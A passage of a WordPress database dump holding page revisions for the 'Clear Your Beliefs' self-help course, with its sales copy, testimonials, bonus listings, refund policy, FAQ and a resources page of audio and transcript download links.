practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs-bk', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-26 16:44:08', '2014-06-26 21:44:08', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1120, 4194, '2014-06-26 16:53:08', '2014-06-26 21:53:08', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-26 16:53:08', '2014-06-26 21:53:08', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1122, 4194, '2014-06-28 09:24:44', '2014-06-28 14:24:44', '<h1 style="text-align: center;">Thank You for Registering for\n<em>Clear Your Beliefs\n</em></h1>\n&nbsp;\n\nThis page contains all of the resources you need to take yourself through this breakthrough program.\n\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\n\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\n\nWelcome to Clear Your Beliefs!\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\n\nLion Goodman\nFounder\n\n&nbsp;\n<h6>Audio Recordings:</h6>\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\n\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3</a>\n<h6><strong>Transcripts:</strong>\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\n</a>\nSession 2:  Clear Your Negative Beliefs About Who You Are\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\n\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\n\nSession 5: Clear Your Old Beliefs About Money and Work\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\n\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\n\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\n&nbsp;\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\n&nbsp;\n<h6>Bonus Materials:</h6>\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\n\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\n\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\n\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\n\n&nbsp;\n\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-autosave-v1', '', '', '2014-06-28 09:24:44', '2014-06-28 14:24:44', '', 139, 'http://clearyourbeliefs.com/139-autosave-v1', 0, 'revision', '', 0),
(1125, 4194, '2014-06-28 09:20:55', '2014-06-28 14:20:55', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 09:20:55', '2014-06-28 14:20:55', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
